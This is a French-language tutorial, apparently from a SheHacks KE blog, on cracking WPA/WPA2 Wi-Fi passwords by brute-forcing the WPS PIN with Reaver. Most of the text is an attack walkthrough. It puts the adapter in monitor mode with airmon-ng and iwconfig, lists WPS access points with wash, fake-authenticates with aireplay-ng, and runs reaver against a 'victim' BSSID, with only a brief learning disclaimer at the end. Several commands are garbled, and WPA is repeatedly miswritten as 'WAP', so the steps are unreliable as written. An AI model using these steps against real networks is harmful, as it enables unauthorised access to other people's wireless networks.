Comment pirater le WPA/WPA2 WiFi avec Reaver

Nous savons tous que la plupart des gens préfèrent mettre un mot de passe WiFi à leur connexion sans fil. Celui-ci peut être aussi simple que 12345 ou aussi complexe qu’une combinaison de plusieurs lettres, chiffres et caractères. Eh bien, voici les mauvaises nouvelles, il existe un outil du nom de reaver qui peut être utilisé pour craquer votre mot de passe WAP/WAP2 WiFi.

A propos de WEP, WAP et WAP2

Pour améliorer les fonctions de WEP (Wired Equivalent Privacy), le WiFi Protected Access ou WPA a été créé en 2003. Cette amélioration temporaire présente toujours une sécurité relativement faible mais est plus facile à configurer. Le WPA utilise le protocole d’intégrité des clés temporelles (TKIP) pour un cryptage plus sûr que celui offert par le WEP.

Un an plus tard, en 2004, le WiFi Protected Access 2 est devenu disponible. Le WPA2 offre une sécurité plus forte et est plus facile à configurer que les options précédentes. La principale différence avec le WPA2 est qu’il utilise la norme de cryptage avancée (AES) au lieu de TKIP.

Ce dont vous avez besoin .

  • Un adaptateur WiFi qui supporte le mode moniteur
  • Un ordinateur avec WiFi
  • Un réseau WiFi sécurisé WPA à proximité
  • Reaver installé
  • Persistance

Je suppose que votre routeur est configuré pour ne pas utiliser l’authentification par bouton poussoir.(PBC)

Faisons cela

D’abord, si vous utilisez une machine virtuelle, vous devez activer votre contrôleur USB en allant dans les paramètres, puis cliquez sur USB et choisissez votre périphérique USB.

NB : Assurez-vous que l’adaptateur sans fil que vous utilisez supporte le mode moniteur.

Après cela, exécutez la commande suivante :

iwconfig

Cette commande vous montre uniquement les interfaces sans fil

Exécutez :

sudo ifconfig wlan0 down

Ceci désactive le WiFi

Après:

sudo airmon-ng check kill

Cette commande tue tout processus qui pourrait interférer avec l’utilisation de mon interface en mode moniteur. Elle tue le gestionnaire de réseau pour qu’il n’y ait pas d’internet.

Puis exécuter:

iwconfig wlan0 mode monitor

Cette commande change le mode du mode géré au mode moniteur.

Le mode géré est le mode par défaut de tous les appareils sans fil.

La raison pour laquelle nous devons changer le mode de géré à moniteur est que nous ne voulons pas seulement capturer les paquets qui ont l’adresse mac à notre appareil mais tous les paquets, même ceux envoyés au routeur et aux autres appareils. Ceci n’est possible que lorsque l’adaptateur wifi est en mode moniteur.

Puis exécuter:

sudo ifconfig wlan0 up

Cela remet le wifi en marche.

Puis exécuter:

iwconfig

Cela permet de vérifier si notre mode a changé de géré à moniteur. Si c’est le cas, cela devrait être indiqué dans le terminal.

La figure ci-dessous montre que le mode est passé à monitor.

wash - interface wlan0

Cela montre toutes les Aps activées par le WPS utilisant l’interface sans fil.

Aireplay-ng - fakeauth 30 -a<bssid> -h <macid> wlan0

Pour l’identification mac, ouvrez un nouvel onglet et tapez ifconfig. Copiez les 12 premiers chiffres de unspec dans wlan0.

N’APPUYEZ PAS ENCORE SUR ENTRÉE.

Ouvrez un autre nouvel onglet.

Vérifiez que vous avez reaver installé. Si vous ne l’avez pas, exécutez la commande suivante.

Sudo apt-get install aircrack-ng reaver

Ceci va installer reaver.

Reaver force brutalement le pin et l’associe à la cible, une fois qu’il a le pin, il l’utilise pour calculer la clé WAP/WAP2 réelle.

Puis lancez la commande suivante :

Reaver - bssid<victim bssid> - channel <the channel of the victim> - interface wlan0 –vvv - no-associate

Tapez entrée sur cet onglet et tapez également entrée sur l’autre onglet que je vous ai dit de ne pas taper.

Cela devrait prendre quelques minutes puisqu’il essaie toutes les combinaisons possibles et finalement il vous donnera le pin WPS, le mot de passe WAP et le nom du Wi-Fi

DISCLAIMER. Cet article est à des fins d’apprentissage, nous ne sommes pas responsables de tout préjudice causé en s’y référant.

Article de Restercuter Nyawira, membre de SheHacks KE, formatrice et passionnée de cybersécurité. Trouvez-la sur LinkedIn (Restercuter Nyawira) et sur Twitter @Restercuter1.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée.